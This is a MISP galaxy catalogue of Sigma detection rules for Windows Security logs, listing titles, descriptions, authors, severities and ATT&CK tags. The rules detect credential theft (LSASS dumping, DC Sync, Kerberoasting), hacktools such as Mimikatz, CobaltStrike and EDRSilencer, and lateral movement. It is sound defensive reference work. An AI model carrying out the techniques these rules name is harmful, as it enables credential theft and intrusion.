UUID 20d96d95-5a20-4cf1-a483-f3bda8a7c037 which can be used as unique global reference for Add or Remove Computer from DC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_add_remove_computer.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1207']
Related clusters

To see the related clusters, click here.

SCM Database Privileged Operation

Detects non-system users performing privileged operations on the SCM database

Internal MISP references

UUID dae8171c-5ec6-4396-b210-8466585b53e9 which can be used as unique global reference for SCM Database Privileged Operation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
creation_date 2019/08/15
falsepositive ['Unknown']
filename win_security_scm_database_privileged_operation.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Suspicious Windows ANONYMOUS LOGON Local Account Created

Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as a covering detection for the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.

Internal MISP references

UUID 1bbf25b9-8038-4154-a50b-118f2a32be27 which can be used as unique global reference for Suspicious Windows ANONYMOUS LOGON Local Account Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton / @4A616D6573
creation_date 2019/10/31
falsepositive ['Unknown']
filename win_security_susp_local_anon_logon_created.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001', 'attack.t1136.002']
Related clusters

To see the related clusters, click here.

HackTool - NoFilter Execution

Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators

Internal MISP references

UUID 7b14c76a-c602-4ae6-9717-eff868153fc0 which can be used as unique global reference for HackTool - NoFilter Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stamatis Chatzimangou (st0pp3r)
creation_date 2024/01/05
falsepositive ['Unknown']
filename win_security_hktl_nofilter.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134', 'attack.t1134.001']
Related clusters

To see the related clusters, click here.

Protected Storage Service Access

Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers

Internal MISP references

UUID 45545954-4016-43c6-855e-eae8f1c369dc which can be used as unique global reference for Protected Storage Service Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/10
falsepositive ['Unknown']
filename win_security_protected_storage_service_access.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

PowerShell Scripts Installed as Services - Security

Detects a PowerShell script installed as a service

Internal MISP references

UUID 2a926e6a-4b81-4011-8a96-e36cc8c04302 which can be used as unique global reference for PowerShell Scripts Installed as Services - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename win_security_powershell_script_installed_as_service.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Denied Access To Remote Desktop

This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available Windows servers in the network.

Internal MISP references

UUID 8e5c03fa-b7f0-11ea-b242-07e0576828d9 which can be used as unique global reference for Denied Access To Remote Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pushkarev Dmitry
creation_date 2020/06/27
falsepositive ['Valid user was not added to RDP group']
filename win_security_not_allowed_rdp_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

HybridConnectionManager Service Installation

Rule to detect the Hybrid Connection Manager service installation.

Internal MISP references

UUID 0ee4d8a5-4e67-4faf-acfa-62a78457d1f2 which can be used as unique global reference for HybridConnectionManager Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Legitimate use of Hybrid Connection Manager via Azure function apps.']
filename win_security_hybridconnectionmgr_svc_installation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1554']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation RUNDLL LAUNCHER - Security

Detects obfuscated PowerShell via RUNDLL LAUNCHER

Internal MISP references

UUID f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_rundll_services_security.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

AD Privileged Users or Groups Reconnaissance

Detects privileged user or group reconnaissance based on event ID 4661 and known privileged user or group SIDs

Internal MISP references

UUID 35ba1d85-724d-42a3-889f-2e2362bcaf23 which can be used as unique global reference for AD Privileged Users or Groups Reconnaissance in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['If source account name is not an admin then its super suspicious']
filename win_security_account_discovery.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Active Directory Replication from Non Machine Account

Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.

Internal MISP references

UUID 17d619c1-e020-4347-957e-1d1207455c93 which can be used as unique global reference for Active Directory Replication from Non Machine Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/07/26
falsepositive ['Unknown']
filename win_security_ad_replication_non_machine_account.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

Password Protected ZIP File Opened (Email Attachment)

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

Internal MISP references

UUID 571498c8-908e-40b4-910b-d2369159a3da which can be used as unique global reference for Password Protected ZIP File Opened (Email Attachment) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/09
falsepositive ['Legitimate used of encrypted ZIP files']
filename win_security_susp_opened_encrypted_zip_outlook.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.initial_access', 'attack.t1027', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

HackTool - EDRSilencer Execution - Filter Added

Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.

Internal MISP references

UUID 98054878-5eab-434c-85d4-72d4e5a3361b which can be used as unique global reference for HackTool - EDRSilencer Execution - Filter Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thodoris Polyzos (@SmoothDeploy)
creation_date 2024/01/29
falsepositive ['Unknown']
filename win_security_hktl_edr_silencer.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Locked Workstation

Detects locked workstation session events that occur automatically after a standard period of inactivity.

Internal MISP references

UUID 411742ad-89b0-49cb-a7b0-3971b5c1e0a4 which can be used as unique global reference for Locked Workstation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/26
falsepositive ['Likely']
filename win_security_workstation_was_locked.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.impact']

ETW Logging Disabled In .NET Processes - Registry

Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.

Internal MISP references

UUID a4c90ea1-2634-4ca0-adbb-35eae169b6fc which can be used as unique global reference for ETW Logging Disabled In .NET Processes - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/05
falsepositive ['Unknown']
filename win_security_dot_net_etw_tamper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

SAM Registry Hive Handle Request

Detects handle requests to the SAM registry hive

Internal MISP references

UUID f8748f2c-89dc-4d95-afb0-5a2dfdbad332 which can be used as unique global reference for SAM Registry Hive Handle Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/12
falsepositive ['Unknown']
filename win_security_sam_registry_hive_handle_request.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012', 'attack.credential_access', 'attack.t1552.002']
Related clusters

To see the related clusters, click here.

SysKey Registry Keys Access

Detects handle requests and access operations to specific registry keys to calculate the SysKey

Internal MISP references

UUID 9a4ff3b8-6187-4fd2-8e8b-e0eae1129495 which can be used as unique global reference for SysKey Registry Keys Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/12
falsepositive ['Unknown']
filename win_security_syskey_registry_access.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Creation

Detects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc.

Internal MISP references

UUID 3a734d25-df5c-4b99-8034-af1ddb5883a4 which can be used as unique global reference for Suspicious Scheduled Task Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_security_susp_scheduled_task_creation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

RDP over Reverse SSH Tunnel WFP

Detects svchost hosting RDP termsvcs communicating with the loopback address

Internal MISP references

UUID 5bed80b6-b3e8-428e-a3ae-d3c757589e41 which can be used as unique global reference for RDP over Reverse SSH Tunnel WFP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/02/16
falsepositive ['Programs that connect locally to the RDP port']
filename win_security_rdp_reverse_tunnel.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.lateral_movement', 'attack.t1090.001', 'attack.t1090.002', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Azure AD Health Service Agents Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g. AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.

Internal MISP references

UUID 1d2ab8ac-1a01-423b-9c39-001510eae8e8 which can be used as unique global reference for Azure AD Health Service Agents Registry Keys Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Unknown']
filename win_security_aadhealth_svc_agent_regkey_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Password Dumper Activity on LSASS

Detects a process handle on the LSASS process with a certain access mask and object type SAM_DOMAIN

Internal MISP references

UUID aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c which can be used as unique global reference for Password Dumper Activity on LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sigma
creation_date 2017/02/12
falsepositive ['Unknown']
filename win_security_susp_lsass_dump.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Teams Application Related ObjectAcess Event

Detects access to authentication tokens and accounts of the Microsoft Teams desktop application.

Internal MISP references

UUID 25cde13e-8e20-4c29-b949-4e795b76f16f which can be used as unique global reference for Suspicious Teams Application Related ObjectAcess Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2022/09/16
falsepositive ['Unknown']
filename win_security_teams_suspicious_objectaccess.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

Weak Encryption Enabled and Kerberoast

Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.

Internal MISP references

UUID f6de9536-0441-4b3f-a646-f4e00f300ffd which can be used as unique global reference for Weak Encryption Enabled and Kerberoast in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2017/07/30
falsepositive ['Unknown']
filename win_security_alert_enable_weak_encryption.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

User Added to Local Administrator Group

Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity

Internal MISP references

UUID c265cf08-3f99-46c1-8d59-328247057d57 which can be used as unique global reference for User Added to Local Administrator Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/14
falsepositive ['Legitimate administrative activity']
filename win_security_user_added_to_local_administrators.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1078', 'attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Hidden Local User Creation

Detects the creation of a local hidden user account which should not happen for event ID 4720.

Internal MISP references

UUID 7b449a5e-1db5-4dd0-a2dc-4e3a67282538 which can be used as unique global reference for Hidden Local User Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/05/03
falsepositive ['Unknown']
filename win_security_hidden_user_creation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Password Protected ZIP File Opened (Suspicious Filenames)

Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.

Internal MISP references

UUID 54f0434b-726f-48a1-b2aa-067df14516e4 which can be used as unique global reference for Password Protected ZIP File Opened (Suspicious Filenames) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/09
falsepositive ['Legitimate used of encrypted ZIP files']
filename win_security_susp_opened_encrypted_zip_filename.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.defense_evasion', 'attack.t1027', 'attack.t1105', 'attack.t1036']
Related clusters

To see the related clusters, click here.

SMB Create Remote File Admin Share

Looks for non-system accounts accessing a file over SMB with a write (0x2) access mask via an administrative share (i.e. C$).

Internal MISP references

UUID b210394c-ba12-4f89-9117-44a2464b9511 which can be used as unique global reference for SMB Create Remote File Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)
creation_date 2020/08/06
falsepositive ['Unknown']
filename win_security_smb_file_creation_admin_shares.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Processes Accessing the Microphone and Webcam

Detects potential adversaries accessing the microphone and webcam on an endpoint.

Internal MISP references

UUID 8cd538a4-62d5-4e83-810b-12d41e428d6e which can be used as unique global reference for Processes Accessing the Microphone and Webcam in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/07
falsepositive ['Unknown']
filename win_security_camera_microphone_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.collection', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Possible PetitPotam Coerce Authentication Attempt

Detects PetitPotam coerced authentication activity.

Internal MISP references

UUID 1ce8c8a3-2723-48ed-8246-906ac91061a6 which can be used as unique global reference for Possible PetitPotam Coerce Authentication Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mauricio Velazco, Michael Haag
creation_date 2021/09/02
falsepositive ['Unknown. Feedback welcomed.']
filename win_security_petitpotam_network_share.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1187']
Related clusters

To see the related clusters, click here.

Potential AD User Enumeration From Non-Machine Account

Detects read access to a domain user from a non-machine account

Internal MISP references

UUID ab6bffca-beff-4baa-af11-6733f296d57a which can be used as unique global reference for Potential AD User Enumeration From Non-Machine Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut)
creation_date 2020/03/30
falsepositive ['Administrators configuring new users.']
filename win_security_ad_user_enumeration.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Active Directory User Backdoors

Detects scenarios where one can control another user's or computer's account without having to use their credentials.

Internal MISP references

UUID 300bac00-e041-4ee2-9c36-e262656a6ecc which can be used as unique global reference for Active Directory User Backdoors in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2017/04/13
falsepositive ['Unknown']
filename win_security_alert_ad_user_backdoors.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.t1098', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Possible Shadow Credentials Added

Detects the possible addition of shadow credentials to an Active Directory object.

Internal MISP references

UUID f598ea0c-c25a-4f72-a219-50c44411c791 which can be used as unique global reference for Possible Shadow Credentials Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)']
filename win_security_susp_possible_shadow_credentials_added.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1556']
Related clusters

To see the related clusters, click here.

WCE wceaux.dll Access

Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host

Internal MISP references

UUID 1de68c67-af5c-4097-9c85-fe5578e09e67 which can be used as unique global reference for WCE wceaux.dll Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/14
falsepositive ['Unknown']
filename win_security_mal_wceaux_dll.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.s0005']
Related clusters

To see the related clusters, click here.

CobaltStrike Service Installations - Security

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement

Internal MISP references

UUID d7a95147-145f-4678-b85d-d1ff4a3bb3f6 which can be used as unique global reference for CobaltStrike Service Installations - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Wojciech Lesicki
creation_date 2021/05/26
falsepositive ['Unknown']
filename win_security_cobaltstrike_service_installs.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

A New Trust Was Created To A Domain

The addition of domains is rare and should be verified for legitimacy.

Internal MISP references

UUID 0255a820-e564-4e40-af2b-6ac61160335c which can be used as unique global reference for A New Trust Was Created To A Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/12/03
falsepositive ['Legitimate extension of domain structure']
filename win_security_susp_add_domain_trust.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Mimikatz DC Sync

Detects Mimikatz DC sync security events

Internal MISP references

UUID 611eab06-a145-4dfa-a295-3ccc5c20f59a which can be used as unique global reference for Mimikatz DC Sync in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu
creation_date 2018/06/03
falsepositive ['Valid DC Sync that is not covered by the filters; please report', 'Local Domain Admin account used for Azure AD Connect']
filename win_security_dcsync.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.s0002', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

Account Tampering - Suspicious Failed Logon Reasons

This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

Internal MISP references

UUID 9eb99343-d336-4020-a3cd-67f3819e68ee which can be used as unique global reference for Account Tampering - Suspicious Failed Logon Reasons in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/19
falsepositive ['User using a disabled account']
filename win_security_susp_failed_logon_reasons.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Service Installed By Unusual Client - Security

Detects a service installed by a client which has PID 0 or whose parent has PID 0

Internal MISP references

UUID c4e92a97-a9ff-4392-9d2d-7a4c642768ca which can be used as unique global reference for Service Installed By Unusual Client - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/15
falsepositive ['Unknown']
filename win_security_service_installation_by_unusal_client.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Enabled User Right in AD to Control User Objects

Detects a scenario where a user is assigned the SeEnableDelegationPrivilege right in Active Directory, which would allow control of other AD user objects.

Internal MISP references

UUID 311b6ce2-7890-4383-a8c2-663a9f6b43cd which can be used as unique global reference for Enabled User Right in AD to Control User Objects in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2017/07/30
falsepositive ['Unknown']
filename win_security_alert_active_directory_user_control.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']

Win Susp Computer Name Containing Samtheadmin

Detects the suspicious computer name samtheadmin-{1..100}$ generated by a hacktool

Internal MISP references

UUID 39698b3f-da92-4bc6-bfb5-645a98386e45 which can be used as unique global reference for Win Susp Computer Name Containing Samtheadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/09/09
falsepositive ['Unknown']
filename win_security_susp_computer_name.yml
level critical
logsource.category No established category
logsource.product windows
tags ['cve.2021.42278', 'cve.2021.42287', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1078']

Suspicious Scheduled Task Update

Detects an update to a scheduled task event that contains suspicious keywords.

Internal MISP references

UUID 614cf376-6651-47c4-9dcc-6b9527f749f4 which can be used as unique global reference for Suspicious Scheduled Task Update in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_security_susp_scheduled_task_update.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1053.005']

DCOM InternetExplorer.Application Iertutil DLL Hijack - Security

Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL Hijack scenario.

Internal MISP references

UUID c39f0c81-7348-4965-ab27-2fde35a1b641 which can be used as unique global reference for DCOM InternetExplorer.Application Iertutil DLL Hijack - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_security_dcom_iertutil_dll_hijack.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1021.003']

Windows Filtering Platform Blocked Connection From EDR Agent Binary

Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.

Internal MISP references

UUID bacf58c6-e199-4040-a94f-95dea0f1e45a which can be used as unique global reference for Windows Filtering Platform Blocked Connection From EDR Agent Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2024/01/08
falsepositive ['Unlikely']
filename win_security_wfp_endpoint_agent_blocked.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']

DiagTrackEoP Default Login Username

Detects the default "UserName" used by the DiagTrackEoP POC

Internal MISP references

UUID 2111118f-7e46-4fc8-974a-59fd8ec95196 which can be used as unique global reference for DiagTrackEoP Default Login Username in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unlikely']
filename win_security_diagtrack_eop_default_login_username.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

Pass the Hash Activity 2

Detects the pass-the-hash attack technique, which is used to move laterally inside the network

Internal MISP references

UUID 8eef149c-bd26-49f2-9e5a-9b00e3af499b which can be used as unique global reference for Pass the Hash Activity 2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)
creation_date 2019/06/14
falsepositive ['Administrator activity']
filename win_security_pass_the_hash_2.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1550.002']

Outgoing Logon with New Credentials

Detects logon events that specify new credentials

Internal MISP references

UUID def8b624-e08f-4ae1-8612-1ba21190da6b which can be used as unique global reference for Outgoing Logon with New Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Legitimate remote administration activity']
filename win_security_susp_logon_newcredentials.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement', 'attack.t1550']

KrbRelayUp Attack Pattern

Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like

Internal MISP references

UUID 749c9f5e-b353-4b90-a9c1-05243357ca4b which can be used as unique global reference for KrbRelayUp Attack Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SBousseaden, Florian Roth
creation_date 2022/04/27
falsepositive ['Unknown']
filename win_security_susp_krbrelayup.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access']

External Remote SMB Logon from Public IP

Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.

Internal MISP references

UUID 78d5cab4-557e-454f-9fb9-a222bd0d5edc which can be used as unique global reference for External Remote SMB Logon from Public IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)
creation_date 2023/01/19
falsepositive ['Legitimate or intentional inbound connections from public IP addresses on the SMB port.']
filename win_security_successful_external_remote_smb_login.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1133', 'attack.t1078', 'attack.t1110']

Failed Logon From Public IP

Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

Internal MISP references

UUID f88e112a-21aa-44bd-9b01-6ee2a2bbbed1 which can be used as unique global reference for Failed Logon From Public IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/05/06
falsepositive ['Legitimate logon attempts over the internet', 'IPv4-to-IPv6 mapped IPs']
filename win_security_susp_failed_logon_source.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.t1078', 'attack.t1190', 'attack.t1133']

RDP Login from Localhost

An RDP login with a localhost source address may be a tunnelled login

Internal MISP references

UUID 51e33403-2a37-4d66-a574-1fda1782cc31 which can be used as unique global reference for RDP Login from Localhost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/01/28
falsepositive ['Unknown']
filename win_security_rdp_localhost_login.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'car.2013-07-002', 'attack.t1021.001']

A Security-Enabled Global Group Was Deleted

Detects activity when a security-enabled global group is deleted

Internal MISP references

UUID b237c54b-0f15-4612-a819-44b735e0de27 which can be used as unique global reference for A Security-Enabled Global Group Was Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2023/04/26
falsepositive ['Unknown']
filename win_security_security_enabled_global_group_deleted.yml
level low
logsource.category No established category
logsource.product windows
